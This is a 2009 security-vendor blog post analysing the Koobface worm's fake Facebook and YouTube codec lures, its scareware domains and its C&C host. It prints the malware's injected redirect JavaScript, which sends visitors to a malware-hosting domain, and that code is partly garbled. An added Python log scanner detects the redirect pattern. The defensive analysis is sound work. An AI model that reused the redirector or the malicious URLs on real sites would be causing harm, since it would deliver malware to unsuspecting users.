R3v3rs3e's Blog

Posts Tagged ‘koobface’

Koobface on the Move, Serving Scareware

Posted by Steve Espino on September 18, 2009

The PC Tools Malware Research Centre has been seeing new movement on the koobface front lately.

[Image: koob_fiddle]

As koobface-serving domains are taken down as soon as the good guys discover them, the bad guys respond by registering new ones. At the moment, their C&C server is hosted in China at IP address 61.235.117.83.

The bad guys are still using a fake Facebook website, as well as posing as a fake codec, in order to distribute koobface.

[Image: fake_facebook]

Clicking anywhere on the page presents us with a file named setup.exe. Here are some of the IPs being used to distribute koobface:

[Image: koob_script]


The JavaScript component used by koobface remains basically the same as before.

And as before, koobface is still serving up scareware. From time to time, users are presented with a My Computer online scan, going through these domains:

[Image: rogue]

gotrioscan(dot)com
plazec(dot)info

In some instances, we also get these warnings:

[Image: hardware_error]
[Image: Internet_Antivirus_Pro]

At the moment, these warnings are serving Internet Antivirus Pro.

In order to be protected against these attacks, users of PC Tools Spyware Doctor are advised to use the latest PC Tools update.

An earlier post about koobface can be found here.

Update:
Koobface has been going at it, and here’s another one that spoofs YouTube and serves koobface malware as a fake codec:

hxxp://71.197.170.226/d=www.marcellaburnard.com/0x3E8/view/console=yes/?go

Posted in Malicious Intent, Rogue Apps

Facebook: Rogue AV Farm?

Posted by Steve Espino on August 10, 2009

There has been enormous movement related to koobface lately and it has been mostly driven by social networking websites such as Facebook, Tagged, Myspace, Twitter, and many others.

One social networking website that probably tops the list of sites used as attack vectors is Facebook.

Here’s a screenshot of a spoofed Facebook website:

[Image: koob1]

We are presented with a fake codec alert, and unsuspecting users usually download and install malware aptly detected by PC Tools Spyware Doctor as Net-Worm.Koobface.

[Image: koob2]

We have seen koobface being hosted on kukuruku-290709(dot)com, but thanks to all the good guys out there, this site has been taken down. The bad guys have responded, however, and are now using legitimate domains and redirections to serve koobface. We have seen a small patch of code on websites used in the redirection:

wrttnsvqnayay qrqgtlzac
script src ="4fc . js" // edited
qsmypwqmoj bbaspbrq

The strings are random, and so are the names of the JavaScript files being executed.

Here’s what the JavaScript file has to offer:

// KROTEG
var abc1 = 'http://kukuruku-290709.com/go/';
var abc2 = 'http://kukuruku-290709.com/go/';
var ss = '' + location.search;
if ((location.search).length>0) abc = abc1; else abc = abc2;
var redirects = [
['facebook.com', abc+'fb.php'],
['tagged.com', abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com', abc+'ms.php'],
['msplinks.com', abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com', abc+'fu.php'],
['twitter.com', abc+'tw.php'],
['hi5.com', abc+'hi5.php'],
['bebo.com', abc+'be.php']
];
var s = '' + document.referrer, r = false;
for (var i = 0; i 0) redir=redir+'&domain='+location.host; else redir=redir+'?domain='+location.host;
location.href = redir;
r = true;
break;
}
}
if (!r) location.href = abc+'index.php'+ location.search;

Since the domain kukuruku-290709(dot)com has been brought down already, we’ll soon most likely see new ones emerge to host koobface.
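Because the hosting domain keeps changing, a proxy-log check can key on the script's behaviour instead: a page load followed by a request to `/go/<page>.php` whose `domain=` value names the host the same client just loaded. The following is an added example, not code from the original post; the log format, the 30-second window and all hostnames are constructed assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Landing-page names from the redirects table in the script above.
LANDING_PAGES = {"fb", "tg", "fr", "ms", "yb", "fu", "tw", "hi5", "be"}
WINDOW = 30  # seconds allowed between page load and redirect (assumed value)

# Constructed proxy log: epoch seconds, client, requested URL.
SAMPLE_LOG = """\
100 10.0.0.5 http://blog.compromised.example/post/1
101 10.0.0.5 http://blog.compromised.example/4fc.js
102 10.0.0.5 http://redirector.example/go/fb.php?domain=blog.compromised.example
200 10.0.0.7 http://shop.compromised.example/?id=7
201 10.0.0.7 http://redirector.example/go/tw.php?id=7&domain=shop.compromised.example
300 10.0.0.8 http://redirector.example/go/ms.php?domain=never.visited.example
400 10.0.0.9 http://old.example/
500 10.0.0.9 http://redirector.example/go/be.php?domain=old.example
600 10.0.0.5 http://cdn.example/static/fb.php?domain=blog.compromised.example
"""

def redirect_target(url):
    """Return (redirector host, landing page, domain= value) for /go/<page>.php."""
    u = urlsplit(url)
    parts = u.path.split("/")
    if len(parts) != 3 or parts[1] != "go" or not parts[2].endswith(".php"):
        return None
    page = parts[2][:-4]
    domain = parse_qs(u.query).get("domain", [""])[-1].lower()
    if page not in LANDING_PAGES or not domain:
        return None
    return u.netloc.lower(), page, domain

def scan(log_text):
    """Flag redirects whose domain= names a host the same client just loaded."""
    last_seen, hits = {}, []  # last_seen[(client, host)] = timestamp
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue  # skip malformed lines
        ts, client, url = int(fields[0]), fields[1], fields[2]
        target = redirect_target(url)
        seen = last_seen.get((client, target[2])) if target else None
        if seen is not None and ts - seen <= WINDOW:
            hits.append((client, target[2], target[0], target[1]))
        last_seen[(client, urlsplit(url).netloc.lower())] = ts
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Each hit names the client, the site carrying the injected script, the redirector host and the landing page, so the first can be cleaned up and the second blocked.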

One of the payloads of koobface is downloading other malware, and currently it is serving Rogue AVs including one that PC Tools Spyware Doctor detects as RogueAntiSpyware.System Security.

We’ve talked about RogueAntiSpyware.System Security in a previous post.

[Image: system_security_scan]

A few weeks prior to today, there was a lot of buzz about Facebook’s Farm Town app serving up Rogue AVs, and recently Facebook is once again associated with Rogue AVs. Clearly, the bad guys behind these attacks are trying to make a quick buck by promoting scareware. And of course, by using techniques such as social engineering, malware and scareware spread rather quickly and easily, because attackers can hide behind the names of even the people we trust.

Take extreme care when viewing emails, tweets, comments or posts, even if they came from people we know.

Posted in Malicious Intent, Rogue Apps

 